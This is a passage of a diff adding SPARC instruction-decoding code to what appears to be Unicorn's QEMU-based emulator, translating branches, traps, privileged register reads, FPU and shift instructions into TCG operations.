TCGv_i64 cpu_src1_64, cpu_src2_64, cpu_dst_64; + target_long simm; + + if (unlikely(qemu_loglevel_mask(CPU_LOG_TB_OP | CPU_LOG_TB_OP_OPT))) { + tcg_gen_debug_insn_start(tcg_ctx, dc->pc); + } + + // Unicorn: trace this instruction on request + if (hook_insn && HOOK_EXISTS_BOUNDED(dc->uc, UC_HOOK_CODE, dc->pc)) { + gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, dc->uc, dc->pc); + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + } + + opc = GET_FIELD(insn, 0, 1); + rd = GET_FIELD(insn, 2, 6); + + switch (opc) { + case 0: /* branches/sethi */ + { + unsigned int xop = GET_FIELD(insn, 7, 9); + int32_t target; + switch (xop) { +#ifdef TARGET_SPARC64 + case 0x1: /* V9 BPcc */ + { + int cc; + + target = GET_FIELD_SP(insn, 0, 18); + target = sign_extend(target, 19); + target <<= 2; + cc = GET_FIELD_SP(insn, 20, 21); + if (cc == 0) + do_branch(dc, target, insn, 0); + else if (cc == 2) + do_branch(dc, target, insn, 1); + else + goto illegal_insn; + goto jmp_insn; + } + case 0x3: /* V9 BPr */ + { + target = GET_FIELD_SP(insn, 0, 13) | + (GET_FIELD_SP(insn, 20, 21) << 14); + target = sign_extend(target, 16); + target = (int32_t)((uint32_t)target << 2); + cpu_src1 = get_src1(dc, insn); + do_branch_reg(dc, target, insn, cpu_src1); + goto jmp_insn; + } + case 0x5: /* V9 FBPcc */ + { + int cc = GET_FIELD_SP(insn, 20, 21); + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + target = GET_FIELD_SP(insn, 0, 18); + target = sign_extend(target, 19); + target = (int32_t)((uint32_t)target << 2); + do_fbranch(dc, target, insn, cc); + goto jmp_insn; + } +#else + case 0x7: /* CBN+x */ + { + goto ncp_insn; + } +#endif + case 0x2: /* BN+x */ + { + target = GET_FIELD(insn, 10, 31); + target = sign_extend(target, 22); + target = (int32_t)((uint32_t)target << 2); + do_branch(dc, target, insn, 0); + goto jmp_insn; + } + case 0x6: /* FBN+x */ + { + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + target = GET_FIELD(insn, 10, 31); + target = sign_extend(target, 22); + target = (int32_t)((uint32_t)target << 2); + do_fbranch(dc, target, insn, 0); + goto jmp_insn; + } + case 0x4: /* SETHI */ + /* Special-case %g0 because that's the canonical nop. */ + if (rd) { + uint32_t value = GET_FIELD(insn, 10, 31); + TCGv t = gen_dest_gpr(dc, rd); + tcg_gen_movi_tl(tcg_ctx, t, value << 10); + gen_store_gpr(dc, rd, t); + } + break; + case 0x0: /* UNIMPL */ + default: + goto illegal_insn; + } + break; + } + break; + case 1: /*CALL*/ + { + target_long target = (int)(((unsigned int)(GET_FIELDs(insn, 2, 31))) << 2); + TCGv o7 = gen_dest_gpr(dc, 15); + + tcg_gen_movi_tl(tcg_ctx, o7, dc->pc); + gen_store_gpr(dc, 15, o7); + target += dc->pc; + gen_mov_pc_npc(dc); +#ifdef TARGET_SPARC64 + if (unlikely(AM_CHECK(dc))) { + target &= 0xffffffffULL; + } +#endif + dc->npc = target; + } + goto jmp_insn; + case 2: /* FPU & Logical Operations */ + { + unsigned int xop = GET_FIELD(insn, 7, 12); + TCGv cpu_dst = get_temp_tl(dc); + TCGv cpu_tmp0; + + if (xop == 0x3a) { /* generate trap */ + int cond = GET_FIELD(insn, 3, 6); + TCGv_i32 trap; + int l1 = -1, mask; + + if (cond == 0) { + /* Trap never. */ + break; + } + + save_state(dc); + + if (cond != 8) { + /* Conditional trap. */ + DisasCompare cmp; +#ifdef TARGET_SPARC64 + /* V9 icc/xcc */ + int cc = GET_FIELD_SP(insn, 11, 12); + if (cc == 0) { + gen_compare(dc, &cmp, 0, cond); + } else if (cc == 2) { + gen_compare(dc, &cmp, 1, cond); + } else { + goto illegal_insn; + } +#else + gen_compare(dc, &cmp, 0, cond); +#endif + l1 = gen_new_label(tcg_ctx); + tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(cmp.cond), + cmp.c1, cmp.c2, l1); + free_compare(tcg_ctx, &cmp); + } + + mask = ((dc->def->features & CPU_FEATURE_HYPV) && supervisor(dc) + ? UA2005_HTRAP_MASK : V8_TRAP_MASK); + + /* Don't use the normal temporaries, as they may well have + gone out of scope with the branch above. While we're + doing that we might as well pre-truncate to 32-bit. */ + trap = tcg_temp_new_i32(tcg_ctx); + + rs1 = GET_FIELD_SP(insn, 14, 18); + if (IS_IMM) { + rs2 = GET_FIELD_SP(insn, 0, 6); + if (rs1 == 0) { + tcg_gen_movi_i32(tcg_ctx, trap, (rs2 & mask) + TT_TRAP); + /* Signal that the trap value is fully constant. */ + mask = 0; + } else { + TCGv t1 = gen_load_gpr(dc, rs1); + tcg_gen_trunc_tl_i32(tcg_ctx, trap, t1); + tcg_gen_addi_i32(tcg_ctx, trap, trap, rs2); + } + } else { + TCGv t1, t2; + rs2 = GET_FIELD_SP(insn, 0, 4); + t1 = gen_load_gpr(dc, rs1); + t2 = gen_load_gpr(dc, rs2); + tcg_gen_add_tl(tcg_ctx, t1, t1, t2); + tcg_gen_trunc_tl_i32(tcg_ctx, trap, t1); + } + if (mask != 0) { + tcg_gen_andi_i32(tcg_ctx, trap, trap, mask); + tcg_gen_addi_i32(tcg_ctx, trap, trap, TT_TRAP); + } + + gen_helper_raise_exception(tcg_ctx, tcg_ctx->cpu_env, trap); + tcg_temp_free_i32(tcg_ctx, trap); + + if (cond == 8) { + /* An unconditional trap ends the TB. */ + dc->is_br = 1; + goto jmp_insn; + } else { + /* A conditional trap falls through to the next insn. */ + gen_set_label(tcg_ctx, l1); + break; + } + } else if (xop == 0x28) { + rs1 = GET_FIELD(insn, 13, 17); + switch(rs1) { + case 0: /* rdy */ +#ifndef TARGET_SPARC64 + /* undefined in the SPARCv8 manual, rdy on the microSPARC II */ + case 0x01: case 0x02: case 0x03: case 0x04: case 0x05: case 0x06: case 0x07: + case 0x08: case 0x09: case 0x0a: case 0x0b: case 0x0c: case 0x0d: case 0x0e: + /* stbar in the SPARCv8 manual, rdy on the microSPARC II */ + case 0x0f: + /* implementation-dependent in the SPARCv8 manual, rdy on the microSPARC II */ + case 0x10: case 0x11: case 0x12: case 0x13: case 0x14: case 0x15: case 0x16: case 0x17: + case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1e: case 0x1f: + /* Read Asr17 */ + if (rs1 == 0x11 && dc->def->features & CPU_FEATURE_ASR17) { + TCGv t = gen_dest_gpr(dc, rd); + /* Read Asr17 for a Leon3 monoprocessor */ + tcg_gen_movi_tl(tcg_ctx, t, (1 << 8) | (dc->def->nwindows - 1)); + gen_store_gpr(dc, rd, t); + break; + } +#endif + gen_store_gpr(dc, rd, *(TCGv *)tcg_ctx->cpu_y); + break; +#ifdef TARGET_SPARC64 + case 0x2: /* V9 rdccr */ + update_psr(dc); + gen_helper_rdccr(tcg_ctx, cpu_dst, tcg_ctx->cpu_env); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x3: /* V9 rdasi */ + tcg_gen_ext_i32_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_asi); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x4: /* V9 rdtick */ + { + TCGv_ptr r_tickptr; + + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, tick)); + gen_helper_tick_get_count(tcg_ctx, cpu_dst, r_tickptr); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + gen_store_gpr(dc, rd, cpu_dst); + } + break; + case 0x5: /* V9 rdpc */ + { + TCGv t = gen_dest_gpr(dc, rd); + if (unlikely(AM_CHECK(dc))) { + tcg_gen_movi_tl(tcg_ctx, t, dc->pc & 0xffffffffULL); + } else { + tcg_gen_movi_tl(tcg_ctx, t, dc->pc); + } + gen_store_gpr(dc, rd, t); + } + break; + case 0x6: /* V9 rdfprs */ + tcg_gen_ext_i32_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_fprs); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0xf: /* V9 membar */ + break; /* no effect */ + case 0x13: /* Graphics Status */ + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + gen_store_gpr(dc, rd, *(TCGv *)tcg_ctx->cpu_gsr); + break; + case 0x16: /* Softint */ + tcg_gen_ext_i32_tl(tcg_ctx, cpu_dst, tcg_ctx->cpu_softint); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x17: /* Tick compare */ + gen_store_gpr(dc, rd, *(TCGv *)tcg_ctx->cpu_tick_cmpr); + break; + case 0x18: /* System tick */ + { + TCGv_ptr r_tickptr; + + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, stick)); + gen_helper_tick_get_count(tcg_ctx, cpu_dst, r_tickptr); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + gen_store_gpr(dc, rd, cpu_dst); + } + break; + case 0x19: /* System tick compare */ + gen_store_gpr(dc, rd, *(TCGv *)tcg_ctx->cpu_stick_cmpr); + break; + case 0x10: /* Performance Control */ + case 0x11: /* Performance Instrumentation Counter */ + case 0x12: /* Dispatch Control */ + case 0x14: /* Softint set, WO */ + case 0x15: /* Softint clear, WO */ +#endif + default: + goto illegal_insn; + } +#if !defined(CONFIG_USER_ONLY) + } else if (xop == 0x29) { /* rdpsr / UA2005 rdhpr */ +#ifndef TARGET_SPARC64 + if (!supervisor(dc)) { + goto priv_insn; + } + update_psr(dc); + gen_helper_rdpsr(tcg_ctx, cpu_dst, tcg_ctx->cpu_env); +#else + CHECK_IU_FEATURE(dc, HYPV); + if (!hypervisor(dc)) + goto priv_insn; + rs1 = GET_FIELD(insn, 13, 17); + switch (rs1) { + case 0: // hpstate + // gen_op_rdhpstate(); + break; + case 1: // htstate + // gen_op_rdhtstate(); + break; + case 3: // hintp + tcg_gen_mov_tl(tcg_ctx, cpu_dst, *(TCGv *)tcg_ctx->cpu_hintp); + break; + case 5: // htba + tcg_gen_mov_tl(tcg_ctx, cpu_dst, *(TCGv *)tcg_ctx->cpu_htba); + break; + case 6: // hver + tcg_gen_mov_tl(tcg_ctx, cpu_dst, *(TCGv *)tcg_ctx->cpu_hver); + break; + case 31: // hstick_cmpr + tcg_gen_mov_tl(tcg_ctx, cpu_dst, *(TCGv *)tcg_ctx->cpu_hstick_cmpr); + break; + default: + goto illegal_insn; + } +#endif + gen_store_gpr(dc, rd, cpu_dst); + break; + } else if (xop == 0x2a) { /* rdwim / V9 rdpr */ + if (!supervisor(dc)) { + goto priv_insn; + } + cpu_tmp0 = get_temp_tl(dc); +#ifdef TARGET_SPARC64 + rs1 = GET_FIELD(insn, 13, 17); + switch (rs1) { + case 0: // tpc + { + TCGv_ptr r_tsptr; + + r_tsptr = tcg_temp_new_ptr(tcg_ctx); + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, tpc)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 1: // tnpc + { + TCGv_ptr r_tsptr; + + r_tsptr = tcg_temp_new_ptr(tcg_ctx); + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, tnpc)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 2: // tstate + { + TCGv_ptr r_tsptr; + + r_tsptr = tcg_temp_new_ptr(tcg_ctx); + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_ld_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, tstate)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 3: // tt + { + TCGv_ptr r_tsptr = tcg_temp_new_ptr(tcg_ctx); + + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, tt)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 4: // tick + { + TCGv_ptr r_tickptr; + + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, tick)); + gen_helper_tick_get_count(tcg_ctx, cpu_tmp0, r_tickptr); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + } + break; + case 5: // tba + tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, *(TCGv *)tcg_ctx->cpu_tbr); + break; + case 6: // pstate + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, pstate)); + break; + case 7: // tl + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, tl)); + break; + case 8: // pil + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, psrpil)); + break; + case 9: // cwp + gen_helper_rdcwp(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env); + break; + case 10: // cansave + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, cansave)); + break; + case 11: // canrestore + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, canrestore)); + break; + case 12: // cleanwin + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, cleanwin)); + break; + case 13: // otherwin + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, otherwin)); + break; + case 14: // wstate + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, wstate)); + break; + case 16: // UA2005 gl + CHECK_IU_FEATURE(dc, GL); + tcg_gen_ld32s_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, gl)); + break; + case 26: // UA2005 strand status + CHECK_IU_FEATURE(dc, HYPV); + if (!hypervisor(dc)) + goto priv_insn; + tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, *(TCGv *)tcg_ctx->cpu_ssr); + break; + case 31: // ver + tcg_gen_mov_tl(tcg_ctx, cpu_tmp0, *(TCGv *)tcg_ctx->cpu_ver); + break; + case 15: // fq + default: + goto illegal_insn; + } +#else + tcg_gen_ext_i32_tl(tcg_ctx, cpu_tmp0, *(TCGv *)tcg_ctx->cpu_wim); +#endif + gen_store_gpr(dc, rd, cpu_tmp0); + break; + } else if (xop == 0x2b) { /* rdtbr / V9 flushw */ +#ifdef TARGET_SPARC64 + save_state(dc); + gen_helper_flushw(tcg_ctx, tcg_ctx->cpu_env); +#else + if (!supervisor(dc)) + goto priv_insn; + gen_store_gpr(dc, rd, *(TCGv *)tcg_ctx->cpu_tbr); +#endif + break; +#endif + } else if (xop == 0x34) { /* FPU Operations */ + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + gen_op_clear_ieee_excp_and_FTT(dc); + rs1 = GET_FIELD(insn, 13, 17); + rs2 = GET_FIELD(insn, 27, 31); + xop = GET_FIELD(insn, 18, 26); + save_state(dc); + switch (xop) { + case 0x1: /* fmovs */ + cpu_src1_32 = gen_load_fpr_F(dc, rs2); + gen_store_fpr_F(dc, rd, cpu_src1_32); + break; + case 0x5: /* fnegs */ + gen_ne_fop_FF(dc, rd, rs2, gen_helper_fnegs); + break; + case 0x9: /* fabss */ + gen_ne_fop_FF(dc, rd, rs2, gen_helper_fabss); + break; + case 0x29: /* fsqrts */ + CHECK_FPU_FEATURE(dc, FSQRT); + gen_fop_FF(dc, rd, rs2, gen_helper_fsqrts); + break; + case 0x2a: /* fsqrtd */ + CHECK_FPU_FEATURE(dc, FSQRT); + gen_fop_DD(dc, rd, rs2, gen_helper_fsqrtd); + break; + case 0x2b: /* fsqrtq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_QQ(dc, rd, rs2, gen_helper_fsqrtq); + break; + case 0x41: /* fadds */ + gen_fop_FFF(dc, rd, rs1, rs2, gen_helper_fadds); + break; + case 0x42: /* faddd */ + gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_faddd); + break; + case 0x43: /* faddq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_faddq); + break; + case 0x45: /* fsubs */ + gen_fop_FFF(dc, rd, rs1, rs2, gen_helper_fsubs); + break; + case 0x46: /* fsubd */ + gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_fsubd); + break; + case 0x47: /* fsubq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_fsubq); + break; + case 0x49: /* fmuls */ + CHECK_FPU_FEATURE(dc, FMUL); + gen_fop_FFF(dc, rd, rs1, rs2, gen_helper_fmuls); + break; + case 0x4a: /* fmuld */ + CHECK_FPU_FEATURE(dc, FMUL); + gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmuld); + break; + case 0x4b: /* fmulq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + CHECK_FPU_FEATURE(dc, FMUL); + gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_fmulq); + break; + case 0x4d: /* fdivs */ + gen_fop_FFF(dc, rd, rs1, rs2, gen_helper_fdivs); + break; + case 0x4e: /* fdivd */ + gen_fop_DDD(dc, rd, rs1, rs2, gen_helper_fdivd); + break; + case 0x4f: /* fdivq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_QQQ(dc, rd, rs1, rs2, gen_helper_fdivq); + break; + case 0x69: /* fsmuld */ + CHECK_FPU_FEATURE(dc, FSMULD); + gen_fop_DFF(dc, rd, rs1, rs2, gen_helper_fsmuld); + break; + case 0x6e: /* fdmulq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_QDD(dc, rd, rs1, rs2, gen_helper_fdmulq); + break; + case 0xc4: /* fitos */ + gen_fop_FF(dc, rd, rs2, gen_helper_fitos); + break; + case 0xc6: /* fdtos */ + gen_fop_FD(dc, rd, rs2, gen_helper_fdtos); + break; + case 0xc7: /* fqtos */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_FQ(dc, rd, rs2, gen_helper_fqtos); + break; + case 0xc8: /* fitod */ + gen_ne_fop_DF(dc, rd, rs2, gen_helper_fitod); + break; + case 0xc9: /* fstod */ + gen_ne_fop_DF(dc, rd, rs2, gen_helper_fstod); + break; + case 0xcb: /* fqtod */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_DQ(dc, rd, rs2, gen_helper_fqtod); + break; + case 0xcc: /* fitoq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_ne_fop_QF(dc, rd, rs2, gen_helper_fitoq); + break; + case 0xcd: /* fstoq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_ne_fop_QF(dc, rd, rs2, gen_helper_fstoq); + break; + case 0xce: /* fdtoq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_ne_fop_QD(dc, rd, rs2, gen_helper_fdtoq); + break; + case 0xd1: /* fstoi */ + gen_fop_FF(dc, rd, rs2, gen_helper_fstoi); + break; + case 0xd2: /* fdtoi */ + gen_fop_FD(dc, rd, rs2, gen_helper_fdtoi); + break; + case 0xd3: /* fqtoi */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_FQ(dc, rd, rs2, gen_helper_fqtoi); + break; +#ifdef TARGET_SPARC64 + case 0x2: /* V9 fmovd */ + cpu_src1_64 = gen_load_fpr_D(dc, rs2); + gen_store_fpr_D(dc, rd, cpu_src1_64); + break; + case 0x3: /* V9 fmovq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_move_Q(dc, rd, rs2); + break; + case 0x6: /* V9 fnegd */ + gen_ne_fop_DD(dc, rd, rs2, gen_helper_fnegd); + break; + case 0x7: /* V9 fnegq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_ne_fop_QQ(dc, rd, rs2, gen_helper_fnegq); + break; + case 0xa: /* V9 fabsd */ + gen_ne_fop_DD(dc, rd, rs2, gen_helper_fabsd); + break; + case 0xb: /* V9 fabsq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_ne_fop_QQ(dc, rd, rs2, gen_helper_fabsq); + break; + case 0x81: /* V9 fstox */ + gen_fop_DF(dc, rd, rs2, gen_helper_fstox); + break; + case 0x82: /* V9 fdtox */ + gen_fop_DD(dc, rd, rs2, gen_helper_fdtox); + break; + case 0x83: /* V9 fqtox */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_fop_DQ(dc, rd, rs2, gen_helper_fqtox); + break; + case 0x84: /* V9 fxtos */ + gen_fop_FD(dc, rd, rs2, gen_helper_fxtos); + break; + case 0x88: /* V9 fxtod */ + gen_fop_DD(dc, rd, rs2, gen_helper_fxtod); + break; + case 0x8c: /* V9 fxtoq */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_ne_fop_QD(dc, rd, rs2, gen_helper_fxtoq); + break; +#endif + default: + goto illegal_insn; + } + } else if (xop == 0x35) { /* FPU Operations */ +#ifdef TARGET_SPARC64 + int cond; +#endif + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + gen_op_clear_ieee_excp_and_FTT(dc); + rs1 = GET_FIELD(insn, 13, 17); + rs2 = GET_FIELD(insn, 27, 31); + xop = GET_FIELD(insn, 18, 26); + save_state(dc); + +#ifdef TARGET_SPARC64 +#define FMOVR(sz) \ + do { \ + DisasCompare cmp; \ + cond = GET_FIELD_SP(insn, 10, 12); \ + cpu_src1 = get_src1(dc, insn); \ + gen_compare_reg(dc, &cmp, cond, cpu_src1); \ + gen_fmov##sz(dc, &cmp, rd, rs2); \ + free_compare(tcg_ctx, &cmp); \ + } while (0) + + if ((xop & 0x11f) == 0x005) { /* V9 fmovsr */ + FMOVR(s); + break; + } else if ((xop & 0x11f) == 0x006) { // V9 fmovdr + FMOVR(d); + break; + } else if ((xop & 0x11f) == 0x007) { // V9 fmovqr + CHECK_FPU_FEATURE(dc, FLOAT128); + FMOVR(q); + break; + } +#undef FMOVR +#endif + switch (xop) { +#ifdef TARGET_SPARC64 +#define FMOVCC(fcc, sz) \ + do { \ + DisasCompare cmp; \ + cond = GET_FIELD_SP(insn, 14, 17); \ + gen_fcompare(dc, &cmp, fcc, cond); \ + gen_fmov##sz(dc, &cmp, rd, rs2); \ + free_compare(tcg_ctx, &cmp); \ + } while (0) + + case 0x001: /* V9 fmovscc %fcc0 */ + FMOVCC(0, s); + break; + case 0x002: /* V9 fmovdcc %fcc0 */ + FMOVCC(0, d); + break; + case 0x003: /* V9 fmovqcc %fcc0 */ + CHECK_FPU_FEATURE(dc, FLOAT128); + FMOVCC(0, q); + break; + case 0x041: /* V9 fmovscc %fcc1 */ + FMOVCC(1, s); + break; + case 0x042: /* V9 fmovdcc %fcc1 */ + FMOVCC(1, d); + break; + case 0x043: /* V9 fmovqcc %fcc1 */ + CHECK_FPU_FEATURE(dc, FLOAT128); + FMOVCC(1, q); + break; + case 0x081: /* V9 fmovscc %fcc2 */ + FMOVCC(2, s); + break; + case 0x082: /* V9 fmovdcc %fcc2 */ + FMOVCC(2, d); + break; + case 0x083: /* V9 fmovqcc %fcc2 */ + CHECK_FPU_FEATURE(dc, FLOAT128); + FMOVCC(2, q); + break; + case 0x0c1: /* V9 fmovscc %fcc3 */ + FMOVCC(3, s); + break; + case 0x0c2: /* V9 fmovdcc %fcc3 */ + FMOVCC(3, d); + break; + case 0x0c3: /* V9 fmovqcc %fcc3 */ + CHECK_FPU_FEATURE(dc, FLOAT128); + FMOVCC(3, q); + break; +#undef FMOVCC +#define FMOVCC(xcc, sz) \ + do { \ + DisasCompare cmp; \ + cond = GET_FIELD_SP(insn, 14, 17); \ + gen_compare(dc, &cmp, xcc, cond); \ + gen_fmov##sz(dc, &cmp, rd, rs2); \ + free_compare(tcg_ctx, &cmp); \ + } while (0) + + case 0x101: /* V9 fmovscc %icc */ + FMOVCC(0, s); + break; + case 0x102: /* V9 fmovdcc %icc */ + FMOVCC(0, d); + break; + case 0x103: /* V9 fmovqcc %icc */ + CHECK_FPU_FEATURE(dc, FLOAT128); + FMOVCC(0, q); + break; + case 0x181: /* V9 fmovscc %xcc */ + FMOVCC(1, s); + break; + case 0x182: /* V9 fmovdcc %xcc */ + FMOVCC(1, d); + break; + case 0x183: /* V9 fmovqcc %xcc */ + CHECK_FPU_FEATURE(dc, FLOAT128); + FMOVCC(1, q); + break; +#undef FMOVCC +#endif + case 0x51: /* fcmps, V9 %fcc */ + cpu_src1_32 = gen_load_fpr_F(dc, rs1); + cpu_src2_32 = gen_load_fpr_F(dc, rs2); + gen_op_fcmps(dc, rd & 3, cpu_src1_32, cpu_src2_32); + break; + case 0x52: /* fcmpd, V9 %fcc */ + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_op_fcmpd(dc, rd & 3, cpu_src1_64, cpu_src2_64); + break; + case 0x53: /* fcmpq, V9 %fcc */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_op_load_fpr_QT0(dc, QFPREG(rs1)); + gen_op_load_fpr_QT1(dc, QFPREG(rs2)); + gen_op_fcmpq(dc, rd & 3); + break; + case 0x55: /* fcmpes, V9 %fcc */ + cpu_src1_32 = gen_load_fpr_F(dc, rs1); + cpu_src2_32 = gen_load_fpr_F(dc, rs2); + gen_op_fcmpes(dc, rd & 3, cpu_src1_32, cpu_src2_32); + break; + case 0x56: /* fcmped, V9 %fcc */ + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_op_fcmped(dc, rd & 3, cpu_src1_64, cpu_src2_64); + break; + case 0x57: /* fcmpeq, V9 %fcc */ + CHECK_FPU_FEATURE(dc, FLOAT128); + gen_op_load_fpr_QT0(dc, QFPREG(rs1)); + gen_op_load_fpr_QT1(dc, QFPREG(rs2)); + gen_op_fcmpeq(dc, rd & 3); + break; + default: + goto illegal_insn; + } + } else if (xop == 0x2) { + TCGv dst = gen_dest_gpr(dc, rd); + rs1 = GET_FIELD(insn, 13, 17); + if (rs1 == 0) { + /* clr/mov shortcut : or %g0, x, y -> mov x, y */ + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 19, 31); + tcg_gen_movi_tl(tcg_ctx, dst, simm); + gen_store_gpr(dc, rd, dst); + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + if (rs2 == 0) { + tcg_gen_movi_tl(tcg_ctx, dst, 0); + gen_store_gpr(dc, rd, dst); + } else { + cpu_src2 = gen_load_gpr(dc, rs2); + gen_store_gpr(dc, rd, cpu_src2); + } + } + } else { + cpu_src1 = get_src1(dc, insn); + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 19, 31); + tcg_gen_ori_tl(tcg_ctx, dst, cpu_src1, simm); + gen_store_gpr(dc, rd, dst); + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + if (rs2 == 0) { + /* mov shortcut: or x, %g0, y -> mov x, y */ + gen_store_gpr(dc, rd, cpu_src1); + } else { + cpu_src2 = gen_load_gpr(dc, rs2); + tcg_gen_or_tl(tcg_ctx, dst, cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, dst); + } + } + } +#ifdef TARGET_SPARC64 + } else if (xop == 0x25) { /* sll, V9 sllx */ + cpu_src1 = get_src1(dc, insn); + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 20, 31); + if (insn & (1 << 12)) { + tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x3f); + } else { + tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x1f); + } + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + cpu_src2 = gen_load_gpr(dc, rs2); + cpu_tmp0 = get_temp_tl(dc); + if (insn & (1 << 12)) { + tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x3f); + } else { + tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x1f); + } + tcg_gen_shl_i64(tcg_ctx, cpu_dst, cpu_src1, cpu_tmp0); + } + gen_store_gpr(dc, rd, cpu_dst); + } else if (xop == 0x26) { /* srl, V9 srlx */ + cpu_src1 = get_src1(dc, insn); + if (IS_IMM) { /* immediate */ + simm = GET_FIELDs(insn, 20, 31); + if (insn & (1 << 12)) { + tcg_gen_shri_i64(tcg_ctx, cpu_dst, cpu_src1, simm & 0x3f); + } else { + tcg_gen_andi_i64(tcg_ctx, cpu_dst, cpu_src1, 0xffffffffULL); + tcg_gen_shri_i64(tcg_ctx, cpu_dst, cpu_dst, simm & 0x1f); + } + } else { /* register */ + rs2 = GET_FIELD(insn, 27, 31); + cpu_src2 = gen_load_gpr(dc, rs2); + cpu_tmp0 = get_temp_tl(dc); + if (insn & (1 << 12)) { + tcg_gen_andi_i64(tcg_ctx, cpu_tmp0, cpu_src2, 0x3f); + tcg_gen_shr_i64(tcg_ctx, cpu_dst, cpu_src1, 